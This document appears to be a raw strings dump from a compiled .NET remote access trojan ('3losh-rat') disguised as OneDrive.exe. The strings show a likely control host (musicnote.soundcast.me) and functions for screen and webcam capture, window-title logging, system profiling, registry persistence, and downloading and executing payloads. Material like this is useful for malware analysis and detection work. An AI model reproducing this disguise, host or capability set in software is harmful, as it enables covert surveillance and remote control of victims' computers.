!This program cannot be run in DOS mode.
`.rsrc
@.reloc
Z:Ca;
s_
dsA
v2.0.50727
#Strings
<>9__24_0
<PrincipalWorker>b__24_0
E42B910EF43B9832D7930F42EE674A79DE5F75E3B4BF5E5E620A3ADD456DF702
__StaticArrayInitTypeSize=22
D8BF0A855FE0E8D661F4C91CA53DF73752F2182A529E8F6CF750BB726515E132
__StaticArrayInitTypeSize=32
Microsoft.Win32
UInt32
ToInt32
StringToBase64
__StaticArrayInitTypeSize=7
get_UTF8
EB2F1E89B1BC032DCD0BD3A076EB46A773DF8A95D944EF4B5A05063AD20E7689
<Module>
<PrivateImplementationDetails>
032D8D0DD02C4AA3B4E3FC8F9A488BCFD8C82D3DD8309F0CCDC474ADA8848B1A
capGetDriverDescriptionA
System.IO
value__
DownloadData
HandleData
mscorlib
Thread
Synchronized
GetField
RegistryValueKind
GetMethod
Replace
CreateInstance
defaultInstance
CompressionMode
SelectMode
FromImage
DrawImage
get_Message
Invoke
GetEnvironmentVariable
get_Available
IDisposable
get_Handle
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
Rectangle
GetForegroundWindowTitle
Module
get_Name
cbName
GetTempFileName
get_MachineName
rootPathName
get_FullName
get_UserName
className
MutexName
lpszName
GetOsFullname
DateTime
get_LastWriteTime
LocalMachine
ValueType
GetType
FileSystemFeature
get_Culture
set_Culture
resourceCulture
MethodBase
ApplicationSettingsBase
Dispose
get_Date
EditorBrowsableState
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggerNonUserCodeAttribute
DebuggableAttribute
EditorBrowsableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
FlagsAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
ReadByte
WriteByte
DeleteValue
GetValue
SetValue
defaultValue
Receive
OneDrive
Remove
OneDrive.exe
volumeNameSize
nFileSystemNameSize
set_SendBufferSize
set_ReceiveBufferSize
get_Jpeg
System.Threading
add_SessionEnding
Encoding
System.Drawing.Imaging
FromBase64String
ToBase64String
SendString
Base64ToString
BytesToString
lpString
GetString
System.Drawing
ComputeHash
ComputeStringHash
get_ExecutablePath
GetFolderPath
get_Width
get_Length
processInformationLength
maximumComponentLength
GetWindowTextLength
EndsWith
StartsWith
SessionEndingCallback
RegistryKeyPermissionCheck
System.ComponentModel
Kernel32.dll
avicap32.dll
user32.dll
ntdll.dll
StartupCopiedAssemblyFileStream
NetworkStream
GZipStream
GetStream
MemoryStream
Program
System
HashAlgorithm
resourceMan
ToBoolean
CopyFromScreen
get_PrimaryScreen
CurrentPlugin
rawPlugin
Version
System.IO.Compression
Application
GetVolumeInformation
processInformation
CopyPixelOperation
System.Configuration
System.Globalization
System.Reflection
get_Position
set_Position
Exception
GetGenericInfo
FieldInfo
MethodInfo
FileInfo
CultureInfo
FileSystemInfo
Bitmap
DecompressGzip
ToChar
lpszVer
volumeSerialNumber
GetHardDriveSerialNumber
MD5CryptoServiceProvider
StringBuilder
SpecialFolder
sender
volumeNameBuffer
fileSystemNameBuffer
buffer
get_ResourceManager
PrincipalWorker
SessionEndingEventHandler
System.CodeDom.Compiler
VictimsOwner
CurrentUser
BitConverter
Cursor
.cctor
Monitor
IntPtr
Graphics
System.Diagnostics
get_Bounds
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.Resources
OneDrive.Properties.Resources.resources
DebuggingModes
OneDrive.Properties
GetModules
GetValueNames
GetTypes
SendBytes
WriteAllBytes
StringToBytes
GetBytes
fileSystemFlags
SocketFlags
Settings
SessionEndingEventArgs
System.Windows.Forms
Contains
StringSplitOptions
get_Chars
RuntimeHelpers
Cursors
processInformationClass
hProcess
NtSetInformationProcess
GetCurrentProcess
System.Net.Sockets
SystemEvents
DoEvents
CameraExists
Concat
ImageFormat
PixelFormat
Object
Connect
System.Net
set_MinWorkingSet
Socket
get_Height
op_Explicit
get_Default
get_Client
WebClient
CurrentTcpClient
Environment
nMaxCount
ThreadStart
Convert
set_SendTimeout
set_ReceiveTimeout
System.Text
GetWindowText
GetForegroundWindow
wDriverIndex
GlobalMutex
InitializeArray
ToArray
CreateSubKey
OpenSubKey
RegistryKey
System.Security.Cryptography
get_Assembly
Memory
DeleteValueFromRegistry
GetValueFromRegistry
StoreValueOnRegistry
op_Equality
op_Inequality
WrapNonExceptionThrows
OneDrive
Copyright
2021
$ab4620bb-da7d-4571-8da8-2e859058d518
1.0.0.0
3System.Resources.Tools.StronglyTypedResourceBuilder
16.0.0.0
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
16.10.0.0
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
C:\Users\Administrator\Desktop\OneDrive\OneDrive\obj\Debug\OneDrive.pdb
_CorExeMain
mscoree.dll
musicnote.soundcast.me
@!#&^%$
279f6960ed84a752570aca7fb2dc1552
HJr()b
4(PCFc%Q
@^kwVh
bg7jB<4"
a#mb'E
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
OneDrive.Properties.Resources
zwazwczwtzw
Unknown error
getvalue
Execute ERROR
Download ERROR
Executed As
Execute ERROR
Update ERROR
Updating To
Update ERROR
3losh-rat
3losh-
Software\
yy-MM-dd
??-??-??
SOFTWARE\Microsoft\Windows NT\CurrentVersion
ProductName
CSDVersion
Microsoft
Microsoft
SystemDrive
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
OneDrive
FileVersion
1.0.0.0
InternalName
OneDrive.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
OneDrive.exe
ProductName
OneDrive
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0